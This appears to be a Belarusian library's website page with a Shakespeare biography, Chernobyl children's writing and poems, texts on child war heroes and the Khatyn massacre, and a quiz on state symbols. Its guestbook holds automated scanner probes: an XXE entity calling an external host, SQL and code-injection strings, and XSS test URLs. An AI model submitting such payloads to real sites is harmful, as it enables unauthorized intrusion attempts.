Шекспир, Уильям
Великий английский писатель родился в семье зажиточного горожанина, ремесленника и торговца Джона Шекспира в провинциальном городе средней Англии — Стратфорде, на берегу реки Эйвон, учился в грамматической школе, где преподавали латинский и греческий языки, литературу и историю. В школе ученики переводили и заучивали огромные отрывки из Цицерона, поэтов и драматургов Вергилия, Овидия, Плавта, составляли ораторские речи на различные темы, разыгрывали целые спектакли из античных авторов.
Маленький городок с двумя тысячами жителей стоял на скрещении торговых путей и жил активной жизнью. В 1553 г. в нем была учреждена корпорация горожан как главный орган местного самоуправления. Совет корпорации ведал всеми делами, в том числе модой на одежду, карал за непристойные поступки и бранные слова и даже наказывал строптивых жен купанием в реке Эйвон. Одно время главой корпорации был избран отец Шекспира. В годы учения Уильяма до городка дошла весть о Варфоломеевской ночи (23 — 24 августа 1572 г.), когда католики устроили в Париже резню гугенотов. Усилилось преследование католиков во всех протестантских странах, в том числе и в Англии. Юные враги католицизма, заподозрив своего учителя в симпатиях к католикам, устроили в школе погром, за что пришлось расплачиваться родителям. Шекспир был среди младших школьников, но учитель для всех классов был в школе один. Это был Саймон Хант, бакалавр Оксфордского университета.
После окончания школы Шекспир помогал отцу в разнообразных делах, потом работал младшим учителем. В восемнадцать лет он женился на Анне Хэтевей, дочери богатого фермера, которую знал с самых юных лет.
Во времена детства и юности Шекспира в городе часто давались представления странствующих актеров. Одну из таких трупп изобразил Шекспир в «Гамлете». В 1585 г. он, по-видимому, примкнул к такой труппе и покинул родной город.
Эпоха, в которую жил Шекспир, была переломной в истории европейского общества: мир словно рождался заново. Это была эпоха Возрождения, эпоха молодости буржуазной цивилизации, когда человек, сбрасывая оковы средневековья, поверил в свои силы и совершал дерзновенные дела. Великая мысль Возрождения провозгласила, что быть человеком — счастье. Гамлет, герой трагедии Шекспира, говорит: «Что за мастерское создание человек! ...Краса вселенной! Венец всего живущего!» Среди современников Шекспира и близких ему людей было немало могучих человеческих характеров, силой которых питалась душа и муза Шекспира.
Накалом страстей была особенно отмечена политическая жизнь Англии.
В Лондоне Шекспир вначале был наемным актером, потом стал пайщиком и совладельцем театра «Глобус».
Шекспиру было 25 лет, когда он написал свою первую пьесу о междоусобной войне между двумя династиями. Вначале молодой литератор больше переделывал и подновлял уже написанное другими авторами. Но он придавал пьесе такую полноту и убедительность, так обогащал действия и речь персонажей, что пьеса обретала совсем новое лицо. Через десять лет слава Шекспира стала общепризнанной, и скоро он стал первым среди авторов, писавших для сцены. Предприимчивые издатели выпустили ряд произведений, не принадлежащих Шекспиру, подписав их его именем. Оно было гарантией успеха.
Шекспир состоял в труппе театра «Глобус». По горестному стечению обстоятельств театр этот сгорел во время премьеры последней пьесы Шекспира «Генрих VIII». После четверти века работы в Лондоне драматург возвратился в свой родной город и через три года скончался в возрасте 52 лет. Его похоронили под алтарем в храме Троицы.
Творчество Шекспира настолько грандиозно и гениально, а документальных свидетельств о его жизни так мало, что с середины XIX века и по наше время возникают различные домыслы об авторстве его пьес. Эти мнения основаны на недоверии к человеку демократического происхождения, будто бы неспособному создать такие шедевры. Авторство приписывалось и отдельным личностям: философу Фрэнсису Бэкону, драматургу Кристоферу Марло, образованным аристократам и целым творческим группам.
Но серьезные ученые убедительно опровергали эти версии.
Большой энциклопедический справочник школьника по литературе / Красовский В.Е. и др. – М.: Филол. о-во «СЛОВО»: ОЛМА-ПРЕСС Образование, 2005. – 639 с.: ил.
След чорнага ветру. Вачыма дзяцей / Рэд.-склад. В.Ц. Якавенка: Маст. П.Я. Кухта. - Мн .: БелСаЭС "Чарнобыль", 1995. - 336 с .: ил.
Эта книга - чудо, если постичь ее сущность. Она написана детьми того противоречивого поколения, которое допустило аварию на Чернобыльской атомной станции, которое тушило радиационный пожар, который принес неисчислимые потери человечеству, больше всего - белорусам.
Книга написана детьми тех, кто по воле судьбы очутился на зараженной земле, кто кто испробовал на себе облучение радиацией.
Предлагаем вашему вниманию один из рассказов этой книги.
ЛЮДМИЛА БАРДАШЕВИЧ, ученица 9-го класса СШ №2 г. Москва. Ельска.
Здравствуйте, мои потомки!
К вам обращаюсь я, дитя Чернобыля. Хочу донести мою боль, мой страх перед невидимой смертью, перед неизбежностью.
В тот роковой год я собиралась поступать в первый класс. Где было понять мне тогда, что происходило. Помню только необычайно взволнованных мать и отца. И запретна все. В детском саду нас держали в комнатах, как в тюрьме
Я тогда впервые услышал это страшное слово "Чернобыль". . Каждый день погибший, доведенный здесь, обрывает все больше нитей, связывающих нас с жизнью. .
Но вот началось самое страшное: стали умирать молодые люди. Появились странные названия болезней. И от этогоеще труднее стало жить, каждый опасался за свою жизнь, каждый не разал себе вопрос: «Что же дальше будет со мной?» Умирают дети, эти маленькие крохи, которые только начинают жить, которые толком не видели красоты белого света. вообразить ?!
Ну в чем виновата полуторагодовала Наташка Гриневич, которая вдруг перестала слышать? Представьте себе личико Наташки. Симпатичная девочка с большими голубыми глазами и мягкими светлыми волосами. Для нее мир потерял свою прелесть, стал горьким и черным. Таким его сделал чудовищный Чернобыль. Он стал ужасным для Наташки. Да разве только для нее ?! Сколько еще повсюду таких несчастных ... У каждого своя трагедия. И мне страшно, а вдруг это будет и с моим будущим ребенком? Я не хочу, чтобы так было! Я не хочу жить в страхе неизвестно перед чем, не хочу видеть страдания близких! Что же мне сделать, чтобы избежать всего этого? Я люблю свой угол, свою Беларусь, и не хочу уезжать отсюда, из этого благодатного края. Я понимаю, уже поздно искать виновных в случившемся ... Да и незачем. Уже ничем не искупить страдания людские.
Я верю: вы, мои потомки, будете счастливее нас. Но предостерегаю от ошибок моего времени и заклинаю вас: не допустите нового Чернобыля. Берегите дарованную Богом природу. Мои боль и страх дают мне право на это предостережение.
Элегія адселенай вёскі
Двадцать год, як тут
не жывём мы болей.
Двадцать год пакут
ўперамешку з болем.
Двадцать год скрозь дым
успамін каўтаю.
Двадцать год бяды -
і не бачна краю.
Нават на клады
родныя не легчы.
Двадцать год бяды.
Двадцать год -
як вечнасць.
Анатоль Зэкаў
У 30-кіламетровай зоне
Смерць прыходзіць сёння не з касою,
Вобраз гэты надта састарэу.
Твар яе у той страшэннай зоне
У абліччах іншых я сустрэў.
Смерць расла і яблыкам, і грыбам,
Смерць расла на лузе і градзе.
Смерць плыла ў канаве стромкай рыбай
І ласём няслася па бядзе.
У дварышчах, крапівой зарослых,
З ёй гулялі куры і каты.
Сталі смерцю пыл,
дажджы
і росы,
Нашы дахі,
сцены
і платы.
Кажуць, быў ты ціхім, беларус,
Мы ж цяпер зусім як анямелі.
Самі па сабе акамянелі
Хлеба кус
І нават сала брус.
Не, ніхто стагоў тут не стагуе,
Слова не аброніць і слязы.
І малітву цяжкую,
даўгую
Самі сабе шэпчуць абразы.
Дрот рукой нябачнай радыяцыя
ля дарог раз'юшана ірве.
Зона праз лясы, палі
і нацыю,
праз той страшны радыус плыве.
Радыус той болем толькі мераць.
Валіць лес стамлёная піла.
Зона не праз трыццаць кіламетраў,
А праз сэрца кожнае прайшла.
Казімір Камейша
Даруйце, землякі
Вы мне даруйце, землякі,
што я раней пакінуў хату,
чым не вярнуліся шпакі
ў шпакоўні,
што я ладзіў з татам.
Вы мне даруйце, землякі,
за ўсё даруйце,
калі можна,
што я, маўляў, такі-сякі,
бы прадчуваў той дзень трывожны.
Вы мне даруйце, землякі,
што я не з вашымі сынамі
бягу сягоння да ракі,
дзе сочыць смерць за паплаўкамі.
Вы мне даруйце, землякі,
што ў нашай зраненай старонцы
луг косіце адны,
які
скасіў да вас смяротны стронцый.
Вы мне даруйце, землякі,
што я не з вамі сёння ў лесе
між дрэў
зажураных такіх,
дзе кожны грыб праменіць цэзій.
Вы мне даруйце, землякі,
за лес атручаны і поле,
што лёс мне выпаў не такі,
які на вашу выпаў долю.
Анатоль Зэкаў
Лета 1986 года
Як бывае на свеце!
Мы у гэтае лета,
мой сынок,
не паедзем
да бабулі і дзеда.
На бабулю і дзеда
не крыўдуй,
мой Сярожа.
Ў вёску к ім
гэтым летам
ехаць, сынку, няможна.
Для бабулі і дзеда
гэта страшная мука.
Гэта першае лета,
калі дом -
без унукаў.
Анатоль Зэкаў
8 февраля - День юного героя-антифашиста. Это день памяти всех детей, которые боролись за мир и равенство на земле. В нашей стране в этот день принято вспоминать советских мальчишек и девчонок, которые плечом к плечу со взрослыми отстаивали свободу нашей Родины в году Великой Отечественной войны.
До войны это были самые обыкновенные мальчишки и девчонки. Учились, помогали старшим, играли, бегали-прыгали, разбивали носы и коленки. Их имена знали только родные, одноклассники да друзья.
ПРИШЕЛ ЧАС - ОНИ ПОКАЗАЛИ, КАКИМ ОГРОМНЫМ МОЖЕТ СТАТЬ МАЛЕНЬКОЕ ДЕТСКОЕ СЕДЦЕ, КОГДА РАЗГОРАЕТСЯ В НЕМ СВЯЩЕННАЯ ЛЮБОВЬ К РОДИНЕ И НЕНАВИСТЬ К ЕЕ ВРАГАМ.
Маленькие герои большой войны. Они сражались рядом со старшими - отцами, братьями. Сражались повсюду. На море, как Боря Кулешин. В небе, как Аркаша Каманин. В партизанском отряде, как Леня Голиков. В Брестской крепости, как Валя Зенкина. В керченских катакомбах, как Володя Дубинин. В подполье, как Володя Щербацевич. И ни на миг не дрогнули юные сердца!
Жил
мальчик на хуторе Мшинском,
За дальним кордоном лесным,
Когда появились фашисты,
Он стал партизанским связным.
Ходил он, как нищий, по селам
С холщовой сумой на плече,
В отцовских ботинках тяжелых
И мамином рваном плаще.
То в окна стучался немые,
То брел к старикам на покос.
И танк подрывался на мине,
И поезд летел под откос...
Забылось негромкое имя,
Осталась лишь кличка – Связной.
Он пережил осень и зиму.
Его расстреляли весной…
(М.Вайцман)
Слышали вы в Хатыни
Траурный перезвон?
Кровь от ужаса стынет,
Только раздастся он.
Кажется, ты в пустыне:
Выжжено все дотла.
В этой военной Хатыни ,
Плачут колокола …
- 22 марта отмечается день памяти Хатынской трагедии. Ни на одной самой подробной географической карте вы не найдете сегодня этой белорусской деревни. Хатынь была уничтожена фашистскими карателями весной 1943года.
Оккупировав летом 1941года территорию Белоруссии, фашистские захватчики установили на белорусской земле так называемый «новый порядок» - режим издевательства, насилия и рабства.
За 3 года оккупации на территории Белоруссии фашисты превратили в руины 209 городов, уничтожили 9200 сел и деревень, замучили и сожгли свыше 2-х миллионов 200 тысяч мирных жителей. Везде, где ступала нога фашистского солдата, совершались немыслимые по своей жестокости преступления, жертвами которых были старики, женщины, дети. Гитлеровские палачи последовательно и систематически проводили массовые уничтожения мирного населения. Они истребляли сотнями тысяч ни в чем не повинных людей, применяли изощренные методы пыток, жгли, травили собаками, вешали, умертвляли в газовых камерах, морили голодом, заражали инфекционными заболеваниями, расстреливали.
Это произошло 22 марта 1943 года. Озверевшие фашисты ворвались в деревню Хатынь и окружили ее. Жители деревни ничего не знали о том, что утром в 6 км от Хатыни партизанами была обстреляна автоколонна фашистов и в результате нападения убит немецкий офицер. Но ни в чем не повинным людям фашисты уже вынесли смертный приговор.
Обелиски, Обелиски, Обелиски … и колокола. Их 26. Это хатынский набат. Гневно, тревожно, обличающее рассказывает миру о трагедии белорусской деревни. И предостерегает:
«Люди, будьте бдительны!» Где бы ты ни был, куда бы ни забросили тебя пути-дороги- нигде на земле, кроме как в Хатыни, ты не увидишь «Кладбища деревень», деревень, уничтоженных фашистами вместе с людьми, уничтоженных и не восстановленных. В конце июня 1969 года в Хатынь прибыли делегации из районов республики, доставившие священную землю не возращенных к жизни деревень. 30 июня под звуки траурной мелодии состоялась торжественная церемония закладки земли в урны, установленные на могилах… Могила деревни… Не одного человека, не двух и не трех, а целой деревни, в которой жили десятки и сотни людей.
Остановитесь, люди!
Перед вами - Вечный огонь- символ немеркнущей памяти народной о каждом четвертом, погибшем от рук фашистов на белорусской земле. Рядом с вечным огнем – три березки. Зеленые весной и летом, пожелтевшие осенью, утяжеленные инеем зимой, они стоят, словно в почетном карауле, их столько, сколько осталось в живых белорусов - три из четырех.
79 лет прошло с того страшного дня, когда исчезла с лица земли Хатынь, когда заживо сгорели ее мирные жители. Хатынь не возродилась. Но она не забыта. Наоборот, сегодня ее знает весь мир. Двадцать шесть колоколов звонят над бывшей деревней. Звонят в любую пору года. Звонят ночью и днем. Звонят, напоминая о прошлом: о страшных ужасах войны.
Страшная трагедия Хатыни –частица нашей истории. Мы должны знать и помнить, ведь это наша история, наше прошлое, без которого не может быть будущего.
Викторина «В стране «Символика»
1. Что олицетворяет флаг, герб, гимн? (Родину)
2. В далеком прошлом люди, жившие вместе, образовывали … (Роды и племена)
3. В жестких битвах нужно было четко различать своих воинов от вражеских. Назовите эти различия. (Роль различий выполняла, прежде всего, особая форма, особая окраска щитов и особые виды оружия.)
4. Назовите цвет, которым окрашивали предки белорусов щиты. (Красный).
5. Что означает геральдика? (Геральдика – от ср.-век. лат. heraldus - глашатай), гербоведение. Со 2-й пол. 19 в. вспомогательная историческая дисциплина, изучающая гербы; ранее - в 13 - 1-й пол. 19 вв. - составление дворянских, цеховых и земельных гербов.)
6. Во что со временем преобразовался щит воина украшенный разными «счастливыми приметами» и «знаками судьбы»? (В герб)
7. Что означает герб? (Герб – официальная эмблема государства, изображаемая на печатях, бланках государственных органов, денежных знаках и т. п. Часто является составной частью государственного флага.)
8. Символом чего, в наше время, стал герб, который свидетельствовал о родовитости короля, князя? (Символом государства)
9. Перечислите основные национальные духовные ценности белорусов, которые запечатлены в гербе. (Гражданское единство, труд, миролюбие, готовность постоять за свою свободу и суверенность)
10. Какими растениями переплетен герб? (С одной стороны розовыми цветами клевера, с другой – голубыми цветками льна.)
11. Назовите растение, символ связи с миром животных. (Клевер)
12. Хлопок Севера, прекрасный материал для одежды. (Лен)
13. Символ труда, знак добра и достатка. (Лен)
14. Земной шар – это знак того, что … (Республика Беларусь воспринимает все народы Земли, как равноправных друзей и партнеров)
15. Что жертвовали богам славяне с просьбой о даровании нового урожая? (Пучок или сноп хлебных колосьев)
16. Какой «сноп» в прежние времена почитался чудодейственным, и им украшали угол хаты? («Дожиночный»)
17. Для чего «дожиночный» столб украшал угол хаты? (Отпугивал злые силы)
18. Пятиконечная звезда – … (Символ человека и человечества.)
19. Что означает флаг? (Флаг - (нидерл. vlag), прикрепленное к древку или шнуру полотнище установленных размеров и цветов, иногда с изображением на нем герба, эмблемы.)
20. Что означает государственный флаг? (Государственный флаг – официальный символ государственной власти, олицетворяет суверенитет государства. Описание государственного флага, как правило, фиксируется в Конституции. Государственный флаг Республики Беларусь поднимается на зданиях верховных органов государственной власти и управления, посольств, торгпредств, консульств Республики Беларусь за рубежом и т. д.)
21. Для чего служит флагшток? (Флагшток - (от голл. vlaggestok), вертикальный шест для подъема флага.)
22. Сколько цветов имеет белорусский флаг? (3: красный, зеленый, белый)
23. Вернемся в древние времена. Знаком чего до сих пор служит красный цвет? (Знаком Солнца)
24. В старину знатные люди носили красные … (Шапки) и красные … (Сапоги).
25. Зеленый цвет – это цвет Природы, … (Цвет добра, роста, развития, благополучия и мира).
26. Перечислите качества, которые должен свято хранить в своей душе настоящий сын белорусской земли. Эти качества связаны с белым цветом нашего флага. (Свобода, нравственная чистота и мудрость).
27. Каким поступком считается спасение флага в боевых условиях? (Доблестным, героическим)
28. Когда был принят ныне действующий флаг и герб Республики Беларусь? (Герб и флаг Республики Беларусь был принят 14 мая 1995 г.)
29. Что означает гимн? (Гимн - (греч. hymnos), торжественная песнь. Известны гимны государственные, революционные, военные, религиозные, в честь определенных событий.)
30. Что означает государственный гимн? (Государственный гимн - официальный символ государства (наряду с государственным флагом и государственным гербом). Символ государственного суверенитета Республики Беларусь.)
31. Символический рисунок, графический способ заклинания высших божественных сил. Узор, состоящий из ритмически упорядоченных элементов для украшения каких-либо предметов или архитектурных сооружений. (Орнамент – от лат. ornamentum - украшение)
32. Посредством узоров или орнамента люди выражали различные пожелания и заветы. На государственном флаге Республики Беларусь запечатлена часть наиболее древнего орнамента. Кем и когда была выполнена эта работа? (Работа была выполнена в 1917 г. Крестьянкой Матрёной Маркевич из Сенненского уезда.)
33. Что означают на орнаменте ромбы? (В центре ромб с толстыми «крючками» или «рогами» - это вечность в движении. А сам ромб – это древнейшее изображение башни Земли и Плодородия. Ромбы поменьше – это тоже заклинание – «хлебы», т.е. пища, которую нужно понимать как пищу для духа и пищу для тела.)
34. Что символизирует орнамент? (Трудолюбие, трудовое мастерство)
35. Справедливая форма выяснения воли и желания народа, изобретенная еще в глубокой древности. (Референдум)
36. Назовите дату празднования Дня Государственного герба и Государственного флага? (Праздник День Государственного герба и Государственного флага отмечается второе воскресение мая.)
Наш адрес: г. Бобруйск
б-р Приберезинский 27
You can do it, too! Sign up for free now at https://www.jimdo.com
e (Wednesday, 31 October 2018 10:17)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
<!ENTITY acunetixent SYSTEM "http://hitPnrLtUqpKp.bxss.me/">
]>
<xxx>&acunetixent;</xxx>
e (Wednesday, 31 October 2018 10:16)
1
e (Wednesday, 31 October 2018 10:14)
1'"
e (Wednesday, 31 October 2018 10:13)
http://hitO7nFZqfy8H.bxss.me/
e (Wednesday, 31 October 2018 10:12)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
e (Wednesday, 31 October 2018 10:12)
;print(md5(acunetix_wvs_security_test));
e (Wednesday, 31 October 2018 10:11)
${9999125+9999897}
e (Wednesday, 31 October 2018 10:11)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
Елена (Thursday, 26 January 2017 07:15)
Спасибо за Ваши материалы. Часто захожу на Вашу страничку.
жанна (Tuesday, 23 September 2014 16:03)
спасибо за ваш труд
Татьяна (Saturday, 15 February 2014 10:33)
Спасибо, коллеги, за вашу работу!